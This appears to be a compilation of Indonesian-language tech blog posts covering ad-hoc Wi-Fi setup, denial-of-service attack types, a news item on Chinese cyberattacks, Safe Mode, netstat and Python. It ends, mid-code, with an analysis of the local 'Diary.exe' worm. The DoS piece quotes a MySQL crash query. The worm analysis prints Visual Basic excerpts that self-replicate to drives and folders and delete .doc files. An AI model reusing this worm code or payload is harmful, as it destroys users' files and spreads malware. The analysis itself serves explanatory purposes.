Membuat jaringan Wi-fi

Berikut ini beberapa langkah yang lakukan untuk membuat jaringan Ad Hoc ini :

1. Aktifkan Wi-Fi Anda
Langkah pertama yang paling penting adalah mempersiapkan perangkat jaringan wireless Anda dan mengaktifkannya. Cara mengaktifkan fitur Wi-Fi pada setiap komputer cukup beragam. Ada yang harus menekan tombol khusus baru kemudian aktif. Ada juga yang cukup mengaktifkannya melalui layar Windows Anda. Untuk mengaktifkannya melalui layar monitor; buka Control Panel, Network Connection, pada icon Wireless Network Connection klik kanan dan pilih Enable. Setelah itu, klik kanan kembali dan pilih View Available Wireless Network. Jika pada layar ada sebuah koneksi wireless tersedia, Anda tinggal pilih kemudian tekan tombol Connect.

2. Buat Jaringan Wi-Fi Sendiri
Namun bila koneksi Wi-Fi belum tersedia, Anda memang harus membuatnya sendiri. Apalagi pada komputer pertama sekali yang akan digunakan untuk jaringan. Caranya cukup pergi ke Control Panel, pilih Network Connection. Kemudian pada halaman NetworkConnection pilih Wireless Network Connection. Klik kanan kemudian pilih Properties. Setelah itu, buka halaman Wireless Network. Pada halaman ini berikan tanda centang pada Use Windows to configure my wireless network settings. Kemudian tekan tombol Add di bagian Prefered Networks.

3. Namakan Koneksi
Langkah kedua adalah menamakan koneksi wireless yang akan Anda buat. Nama koneksi dapat terserah diberikan, pengetikan nama koneksi dilakukan dalam boks SSID. Jika Anda ingin memiliki password untuk jaringan ini, pada opsi The key is provided for me automatically hapus tanda centang. Kemudian pada drop down menu Network Authentication, pilih Open atau Shared untuk menggunakan network key WEP atau memilih WPA-None untuk memilih menggunakan network key WPA. WPA memang lebih baik, namun tidak semua perangkat mendukungnya. Kemudian masukkan kuncinya pada kolom Network key dan Confirm network key.

4. Berikan Password WEP
Bila Anda memilih untuk memberikan password atau key secara manual, maka pada layar selanjutnya Anda akan dipertanyakan password tersebut. Bila Anda menggunakan password WEP (Wired Equivalent Privacy) ada aturan penggunaannya, yaitu hanya diperbolehkan 5 atau 13 karakter untuk penulisan password yang hanya menggunakan 1 jenis karakter. Untuk dua jenis karakter (angka dan huruf) hanya diperbolehkan sebanyak 10 atau 26 karakter. Perlu diingat bahwa semakin panjang dan rumit password akan semakin baik.

5. Berikan Password WPA
Anda dapat juga memberikan password WPA (Wi-Fi Protected Access). Pada penggunaan password WPA aturan yang harus ditaati adalah jumlah karakter yang dapat digunakan antara 8 sampai 63 untuk satu jenis karakter dan 64 karakter untuk lebih dari satu jenis karakter. Setelah selesai nanti, Anda dapat mencetak password ini untuk kemudian digunakan menambah komputer ke dalam jaringan nantinya. Dan perlu diingatkan bahwa penggunaan kunci WPA tidak selalu dapat diterapkan di setiap komputer. Ada beberapa perangkat jaringan nirkabel yang tidak dapat menerima kunci WPA.

6. Ad Hoc
Satu lagi yang perlu dilakukan adalah menjadikannya jaringan Ad Hoc. Jaringan Ad Hoc adalah jaringan yang hanya menghubungkan komputer ke komputer tanpa melalui sebuah hub atau router sebagai access point. Untuk jaringan nirkabel rumahan atau kantor kecil cukup menggunakan jaringan jenis ini. Oleh sebab itu, salah satu yang tidak boleh dilewatkan adalah memberikan tanda centang pada opsi This is a computer-to-computer (ad-hoc) network, wireless access points are not used. Opsi ini terletak di bagian paling bawah layar Association. Setelah selesai tekan OK.

7. Mulai Buat Jaringan Baru
Langkah selajutnya adalah membuat jaringan baru menggunakan koneksi yang sudah ada. Langkah pertama dalam membuat jaringan Anda cukup mengikuti wizard yang ada untuk membuat jaringan biasa. caranya masuk ke Control Panel. Kemudian pilih Network Setup Wizard. Ikuti petunjuk yang diberikan. Pada saat wizard mulai dijalankan, Anda akan diminta untuk memeriksa kembali perangkat jaringan yang akan digunakan. Apakah sudah lengkap atau belum. Jika sudah lengkap Anda dapat melanjutkan. Jika belum pastikan terlebih dahulu semua perangkat sudah terpasang dan terinstal dengan baik.

Memahami Serangan Denial of Service

saya akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com.
Apa itu DoS
Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.
Secara umum ada 2 cara melakukan serangan DoS:

1. Mematikan Server
2. Menyibukkan Server

* Tanpa bug/vulnerability
* Meng-exploit bug/vulnerability

DoS dengan Mematikan Server: Kill Them!
Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.
Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.
Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.
Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:

* Ping of Death ( CA-1996-26 )
Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.
* MySQL IF Query DoS ( SA25188 )
Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.

* Cisco Global Site Selector DNS Request Denial of Service (SA33429)
Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.

Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.
DoS dengan Menyibukkan Server: Make Them As Busy As Possible!
Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit. Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.
Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.
DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:

* Exploiting vulnerability: Menyerang dengan malicious request/packet
* No vulnerability exploitation: Menyerang dengan normal request/packet

Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.
Make Server Busy by Exploiting Vulnerability
Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.
Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.
Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:

* TCP SYN Flood DoS
Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.
Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.
* Apache mod_deflate DoS
Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.
Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.

Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.
Make Server Busy Without Exploiting Vulnerability
Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.
Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).
Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.
Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).
Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.
Kesimpulan
Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:

* Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
* Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.

o Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
o Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.

Markas cracker terbesar di dunia

Serangan cyber oleh para cracker semakin bergejolak di dunia maya. Biro sekuriti Symantec coba menganalisis dari mana para cracker ini menjalankan aksinya dan hasilnya, mereka menobatkan sebuah kota di China sebagai ibu kota cracker dunia.

Adalah kota Shaoxing di Negeri Tirai Bambu yang disebut sebagai asal muasal serangan cyber terbesar di dunia. Menurut Symantec, dari total serangan cyber yang berasal dari China 21,3 persen di antaranya dilakukan dari Shaoxing.

China menduduki posisi puncak asal serangan cyber global, dengan persentase 28,2 persen. Posisi berikutnya ditempati Rumania dengan 21,1 persen diikuti berturut-turut oleh Amerika Serikat, Taiwan dan Inggris Raya.

Symantec memaparkan, para cracker di China melakukan pengintaian cyber dengan target serangan misalnya aktivis hak asasi manusia. Ada kemungkinan serangan ini disponsori oleh pemerintah setempat.

Serangan dilakukan dengan mengirim e-mail berisi attachment berbahaya. Jika pengguna komputer membuka attachment yang tampaknya tidak mencurigakan itu, kode jahat akan menginfeksi perangkat mereka.

"Tujuan utamanya adalah untuk mendapatkan akses ke data sensitif atau sistem internal dengan target individu tertentu atau perusahaan," jelas Symantec

Safe Mode, Manfaat dan Penggunaannya

Bagi sebagian besar kita ( pengguna komputer) mungkin tidak asing lagi dengan istilah Safe Mode. Fitur ini di sediakan di sistem operasi Windows, untuk berbagai tujuan. Misalnya untuk memeriksa atau memperbaiki kerusakan pada sistem windows, menghapus virus, memeriksa kerusakan driver dan lainnya.

Bagaimana mengaktifkan Safe Mode dan apa saja yang dapat dimanfaatkan ketika kita sudah masuk Safe Mode ?


Apa itu Safe Mode ?
Safe mode merupakan opsi pilihan start up windows yang fungsi utamanya menangani jika ada masalah dengan sistem. Windows akan berjalan dengan kondisi minimal, hanya file-file dan driver yang penting saja yang di aktifkan, termasuk juga software-software tambahan sebagian besar tidak diaktifkan. Kemudian ketika sudah masuk safe mode, maka akan tampak tulisan “Safe Mode” di pojok atas windows.
Cara Masuk ke Safe Mode
Salah satu cara yang dapat digunakan di hampir semua sistem windows termasuk windows Vista adalah dengan menekan tombol F8 ketika windows sedang booting ( atau ketika komputer mulai menyala dan tampil informasi Memory / hardware ). Setelah itu akan tampil beberapa menu pilihan booting komputer,
Beberapa penjelasan dari Advande Options Menu
Selain menu untuk memilih Safe mode, ada berbagai menu lainnya yang bisa dipilih. Berikut beberapa penjelasan menu-menu tersebut :

* Safe Mode, opsi ini berarti windows akan berjalan hanya menggunakan minimal file dan driver termasuk juga software-softwarenya.
* Safe Mode with Networking, opsi ini seperti safe mode ditambah dengan driver sehingga kita bisa memanfaatkan Jaringan ( Networking)
* Safe Mode with Command Prompt, sama seperti safe mode hanya saja program Command Prompt / MS-DOS Prompt ( cmd.exe) akan langsung aktif ( bukannya explorer)
* Enable Boot Logging, windows akan membuat file Ntbtlog.txt, ketika start up dan informasi start up tersebut akan disimpan di file tersebut. File ini biasanya disimpan di sistem root, misalnya drive C:
* Enable VGA Mode. Windows akan berjalan dengan tampilan mode minimal misalnya 640×480 atau 800×600. Biasa digunakan untuk memeriksa kerusakan atau error [driver] VGA (tampilan grafik windows).
* Last Known Good Configuration, menjalankan windows menggunakan informasi registry yang telah disimpan ketika terakhir shutdown. Gunakan jika kita salah mengubah konfigurasi sistem, atau ketika windows gagal masuk ke tampilan utama.

Beberapa manfaat Safe Mode

* Uninstall software yang sebelumnya menyebabkan komputer hang, error dan sebagainya. Kadang setelah di install program tertentu windows bermasalah, maka jika tidak bisa di uninstall melalui mode biasa gunakan Safe Mode.
* Menonaktifkan aplikasi atau program tertentu. Untuk memudahkan setelah masuk ke Safe Mode, bisa menggunakan aplikasi Autoruns yang bisa diperoleh gratis dari SysInternals. Teknik ini juga bisa dimanfaatkan untuk memeriksa loading komputer yang lambat. Jika tidak ada Autoruns, bisa mengetikkan MSCONFIG di menu Run, untuk menjalankan Sistem Configuration Utility, jika sudah tampil dipilih melalui tab Startup.
* Memeriksa permasalahan dengan tampilan grafik windows (VGA). Ketika tampilan windows bermasalah, bisa di cek dengan memilih “Enable VGA Mode”, jika berhasil dan tidak melihat masalah, kemungkinan masalah di driver VGA.
* Menghapus file/virus yang tidak bisa melalui mode biasa. Sebagian antivirus masih bisa dijalankan di safe mode, dan bisa dicoba scan melalui safe mode. Kadang virus tidak berjalan di safe mode, meski banyak juga yg bisa berjalan/atif meski di Safe Mode.
* Menjalankan System Restore jika sebelumnya diaktifkan, sehingga kondisi sistem bisa dikembalikan ke keadaan sebelumnya.
* Menjalankan berbagai fitur dari Control Panel, Administrative tools dan sebagainya.
* Membuka Registry Editor, baik untuk memeriksa maupun untuk mengedit sebagian isinya.

Safe Mode merupakan fitur standard Windows dan terkadang cukup bermanfaat untuk beberapa masalah seperti diatas, walaupun terkadang seperi virus juga bisa aktif didalam mode ini, sehingga menggunakan safe mode saja tidak cukup

netstat

netstat,net statistic,internet statisticketika menggunakan komputer, banyak dari kita yang kurang memperhatikan tools yang berfungsi sebagai alat untuk memberikan informasi kepada kita secara realtime, padahal mengetahui kondisi komputer kita secara realtime adalah penting karena kita bisa menghandle maupun mengdiagnosis secara cepat dan tepat jika ada permasalahan terjadi

mungkin beberapa dari kita ada yang sudah mengenal salah satu tool bawaan microsoft windows yaitu task manager yang bisa memberikan beragam informasi dasar yang kita butuhkan secara realtime, nah selain task manager tersebut ada juga tools bawaan windows yang memiliki spesialisasi khusus network, namanya network statistics atau biasa di sebut dan disingkat dengan netstat saja.

Fungsi netstat ini cukup beragam (tergantung dari commandnya) namun yang utamanya fungsi netstat ini adalah memeriksa status jaringan serta memberikan informasi tentang adanya transfer data yang terjadi dalam sebuah jaringan yang terhubung ke komputer, baik itu jaringan local (LAN) maupun jaringan Internet, baik itu transfer data masuk (incoming) atau juga outgoing.

Cara mengoperasikan netstat adalah dengan masuk ke CMD dengan urutan klik tombol start > run > ketikkan cmd > klik OK (pada windows xp) atau klik tombol start > ketikkan cmd pada form search > enter (pada windows vista dan 7)

setelah anda berhasil memasuki CMD dengan baik maka tugas anda selanjutnya adalah ketikkan netstat lalu klik enter

setelah itu anda akan mendapatkan informasi-informasi mengenai protocol, Local address, foreign address, dan state.

o,iya, operasi pada netstat juga tidak hanya terbatas pada saat kita mengetik netstat lalu enter saja, tapi lebih dari itu, berikut beberapa operasi atau command yang bisa dijalankan pada netstat:

1. -a: Berfungsi untuk memberikan informasi mengenai seluruh koneksi TCP yang aktif serta Port dari TCP dan UDP di dalam komputer yang dalam state (status) listening
2. -b: Memberikan informasi mengenai nama dari binary program yang memiliki keterlibatan dalam membentuk setiap koneksi(sudah terhubung) atau juga listening port
3. -e: memberikan informasi terkait ethernet
4. -n: memberikan informasi tentang address (alamat) serta no port dengan format numeric
5. -o: menampilkan ID (PID) dari tiap owner yang bergabung dalam koneksi
6. -p proto: menunjukkan koneksi yang diartikan oleh proto
7. -r: menampilkan route table (table routing)
8. -s: memberikan informasi statistik dari tiap protocol
9. -t interval: menampilkan kembali statistik yang telah dipilih(selected statistics)

Keterangan: jangan lupa menambahkan embel-embel netstat di depan command tersebut atau sebelum commands tsb di ketik, ketikkan netstat dahulu, misalnya netstat -a, jangan -a saja

adapun definisi dari beberapa elemen netstat adalah sebagai berikut:

1. Foreign address: menampilkan informasi mengenai alamat koneksi yang dituju oleh local address, format foreign address adalah xxxx:yyyy nah yang xxxx adalah alamat dari koneksi yang dituju (biasanya website/local host) sementara yang yyyy adalah port yang dituju
2. Local address: sama seperti foreign address, hanya saja local address ini untuk komputer local kita yang aktiv melakukan koneksi dengan jaringan luar (foreign address), format local address ini adalah zzzz:tttt dengan zzzz adalah alamat host dalam komputer, dan tttt adalah port
3. Proto: menampilkan jenis protocol yang digunakan (TCP atau UDP)
4. State: status dari tiap koneksi yang terhubung, kolom state ini memiliki 5 kemungkinan yaitu:

-ESTABLISHED: koneksi berhasil

-LISTENING: koneksi siap 100 persen (namun koneksi belum berlangsung)
-SYN_RECEIVED: menerima SYN
-SYN_SENT: mengirim SYN ( waspada jika ditemukan state dari SYN_SENT dalam jumlah yang cukup banyak dan di luar kewajaran, karena efeknya paket data yang dikirim akan lebih ketimbang yang diterima sehingga koneksi akan lambat, hal ini bisa jadi merupakan indikasi adanya malware (trojan,virus,worm,dan lain sebagainya) yang melakukan akses terhadap jaringan
-TIME_WAIT: menunggu koneksi untuk terhubung

Bahasa Pemrograman PHYTON

Mendengar kata Python, yang selalu terbayang adalah jenis ular yang besar dan populer. Di dunia pemrograman, Python juga merupakan sesuatu yang populer, walaupun tingkat popularitas bahasa pemrograman Python mungkin tidak setinggi Java atau PHP. Tetapi, sejak mulai dikembangkan pada akhir tahun 1980-an oleh Guido Van Rossum, Python tidak surut dengan pergerakan teknologi yang pesat, bahkan Python terus mengalami kemajuan dan perbaikan yang signifikan. Hingga saat ini, update terakhir adalah pada 17 Agustus 2009 yang lalu, saat Python 3.1.1 dirilis.


Python tidaklah berbisa. Kita semua tahu bahwa ular Python tidak berbisa, tetapi tetap saja mematikan. Hubungannya apa ya? Bahasa pemrograman Python juga tidak berbisa alias sangat friendly, tetapi mampu membuat killer application. Agar anda langsung memperoleh gambaran dan fakta yang jelas mengenai kemampuannya, berikut beberapa aplikasi populer yang dibuat dengan Python :


1. BitTorrent.
Merupakan aplikasi yang tentu sudah tidak asing lagi (terutama bagi anda yang memiliki koneksi internet unlimited), yaitu sebuah program peer-to-peer untuk melakukan upload/download file melalui protokol BitTorrent. Awalnya, BitTorrent ditulis dengan Python dan merupakan software gratis. Tetapi, sejak versi 6.0 ke atas, BitTorrent ditulis dengan menggunakan C++ dan merupakan software proprietary.
2. Yum.
Yellow dog Updater, Modified atau dikenal dengan YUM, merupakan sebuah utiliti RPM manajemen paket berbasis command line yang dikenal pada sistem operasi Linux. Eksistensi Python memang sudah cukup dikenal pada distro-distro Linux, juga sering digunakan sebagai bahasa scripting yang embedded pada berbagai aplikasi, diantaranya GIMP, Rhyhmbox, dan Vim.
3. Plone.
Merupakan salah satu Content Management System (CMS) yang memiliki tingkat security yang sangat baik dan memiliki berbagai fitur yang menarik.
4. Civilization 4.
Game komputer dengan genre strategi dan telah dirilis dengan berbagai bahasa. Game ini menggunakan Python untuk melakukan berbagai fungsi, seperti menghasilkan peta, event, dan berbagai interface pada game tersebut.

Dan masih banyak lagi contoh lainnya. Python tidak terbatas untuk pembuatan aplikasi tertentu. Selain contoh-contoh aplikasi populer diatas, berbagai aplikasi seperti instant messaging, database, media player, web framework, dan lainnya, juga dapat dihasilkan oleh bahasa pemrograman Python.

filosofi bahasa pemrograman Python.

Python merupakan bahasa pemrograman tingkat tinggi atau high-level programming language, seperti Java, Delphi, Visual Basic, C++, dan lainnya. Uniknya, Python bukanlah compiler, tetapi interpreter. Ada juga yang mengatakan Python adalah semi-compiler.

Sebenarnya, yang dilakukan Python adalah mengkompilasi kode program ke dalam kode yang disebut bytecode. Bytecode kemudian di-translate lagi ke dalam bahasa yang dimengerti oleh sistem untuk dijalankan. Hal ini menyebabkan Python bersifat portable dan cross-platform. Selain itu, Python juga open source.


Python merupakan pemrograman yang multi-paradigma. Artinya, kita dapat mengadopsi paradigma pemrograman yang sesuai dengan style (gaya) kita, misalnya object-oriented atau pemrograman terstruktur. Python didesain agar mudah dibaca, bahkan bisa dikatakan Python adalah bahasa pemrograman yang paling puitis! Untuk mendeskripsikan filosofi Python, bahkan dibuat The Zen of Python, yang walaupun dibuat dengan gaya humoris, tetapi memang menunjukkan filosofi yang dianut oleh Python, antara lain :

Beautiful is better than ugly...
Explicit is better than implicit...
Simple is better than complex...
Complex is better than complicated...
Flat is better than nested...
dan seterusnya....

Python juga digunakan sebagai embedded atau extension language untuk sebuah modul/aplikasi yang memerlukan interface pemrograman. Dalam hal ini kita dapat melihat kemiripannya dengan VBScript yang merupakan varian terbatas dari bahasa Visual Basic. Lebih jauh lagi, Python dilengkapi dengan library standard yang berisi modul-modul yang beragam, mulai dari cryptography, regular expression, GUI, XML, database, web browser, dan tentunya masih banyak lagi.

Inilah salah satu keunikan yang menjadi kelebihan Python, Python dapat di-implementasikan dalam lingkungan Java, yang dikenal dengan Jython. Artinya, kita dapat menulis program dengan Python dengan menggunakan library Java dan tentunya berjalan pada platform Java. Hal yang sama juga dilakukan IronPython, dimana kita dapat menuliskan program Python dan menggunakan library .NET

PASCAL n DELPHI

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Diary.exe, Apa dan bagaimana ?

A little Words...
Penulis ingin menyampaikan bagaimana virus Diary.exe bekerja dan
tidak ada maksud untuk menyinggung atau menyakiti perasaan korban -
korban yang telah terinfeksi oleh virus ini. Analisis Virus dalam Artikel
ini mungkin bersifat sangat Dasar, oleh karena itu Saya mohon maaf
sebesar-besarnya jika ada kekurangan.
Start...
>Diary.Exe adalah salah satu Virus (yang katanya cukup Berbahaya oleh
Vaksin.com) buatan Vxer (pembuat Virus) lokal. Virus ini dibuat dengan
menggunakan Bahasa Visual Basic 6.0.
Menurut Norman AV, virus ini dikategorikan sebagai varian dari Virus
Kangen yang sempat tersebar beberapa waktu lalu. Saya tidak tahu
mengapa disebut-sebut sebagai varian kangen, apakah karena Icon yang
dipilih adalah Icon MS-Word? atau karena sifatnya yg menginfeksi file
MS-WORD saja? Sampai saat ini saya belum tahu.. Yang pasti virus ini
pertama kali disebarkan di Laboratorium Komputer di salah satu
Universitas yang ada di Depok.
>Virus Diary.Exe bekerja menggunakan algoritma (yang kurang-lebihnya)
sebagai berikut :
|START EXECUTION|
| Create File Diary Seorang Newbie.txt |
|di folder %userprofile%\Application Data|
|
|Periksa apakah folder %ProgramFiles%\Common Files\System ada?|
| tidak ada
|------------------------------------------->|
ada |
53
| |
| Create file Explorer.Exe di folder | |Create file di folder
| %ProgramFiles%\Common Files\System | %systemroot&\System32|
|<-------------------------------------------|
|Infeksi key-key di Registry, Hidden file, Disableregistrytools, Dll|
|
|Periksa apakah folder %Program Files%\InstallShield Installation Information ada?|
| tidak ada
|--------------------------------------------->|
ada |
| |Create folder %Program Files%\InstallShield
| Installation Information|
| |
| |
|<---------------------------------------------|
|Create file Rsvdb.Exe ke %Program Files%\InstallShield Installation Information|
|
|Create file RegsvcChk.Exe ke folder %SystemRoot%|
|
|Create file Spoolsw.Exe ke folder %userprofile%\Application Data|
|
|Execute Regsvcchk.Exe|
|
|Execute Spoolsw.Exe|
|
|Deteksi dan hapus Virus Kangen All Varian di Komputer|
|
|Deteksi dan Infeksi semua File MS-Word (*.Doc) di Komputer|
|
|END EXECUTION|
Semua file MS-Word yang terdeteksi akan diambil namanya, lalu sang
virus akan meng-gandakan dirinya menggunakan nama file tsb. Lalu
bagaimana dengan file .Doc tersebut?
File tsb akan dihapus/didelete. Algoritma jahat inilah yang merugikan
banyak user komputer karena semua file .Docnya telah hilang.
>Berikut cuplikan dari Source Code Diary.Exe :
----------------------------Cut Here---------------------------------
Private Sub cek(path As String)
On Error Resume Next
If Right(path, 1) <> "\" Then
path = path + "\"
54
End If
Set fol = fso.getfolder(path)
Set fil = fol.Files
Set subfol = fol.subfolders
If fso.fileexists(path + "Diary.exe") = True Then
GoTo a
Else
Call copi("Diary.exe", path)
End If
a: For Each fil2 In fil
If fso.getextensionname(fil2.Name) = "doc" Or fso.getextensionname(fil2.Name) = "DOC"
Then
desk1 = Left(fil2.Name, Len(fil2.Name) - 4)
Call copi(desk1 + ".exe", path)
Kill fil2.path
End If
Next
For Each subfols In subfol
cek (subfols.path)
Next
End Sub
----------------------------Cut Here---------------------------------
----------------------------Cut Here---------------------------------
Private Sub Timer1_Timer()
On Error Resume Next
Call GetActiveWindowName
tutup
If InStr(tampung, "A:") <> 0 Then
cek ("A:")
End If
cari
If i > 0 Then
For j = 0 To i - 1
If desk(j) <> "" Then
If InStr(tampung, desk2(j)) <> 0 Then
cek (desk2(j))
End If
End If
Next
End If
End Sub
----------------------------Cut Here---------------------------------
>Algoritma tersebut adalah bagaimana Virus bisa mendeteksi dikala user
sedang membuka Removeable Drive (Disket, USB, Dll) dengan
mengambil Window Captionnya. Hal ini tidak akan berlaku bila user
membukanya di lingkungan DOS (Command Prompt). Dengan cara itu
pula virus bisa menggandakan dirinya dan menyebarkannya lewat
Floopy Disk atau USB Drive.
>Virus juga akan me-Minimize window-window yang mempunyai string
"Registry Editor",
"Application Data", "WINDOWS", "WINNT", "Program Files", "Command
Prompt, "DOS", "Task",
55
"Process", "System", "Hijack", dan "Kill". Berikut adalah code dari
algortima tsb :
----------------------------Cut Here---------------------------------
Private Sub tutup()
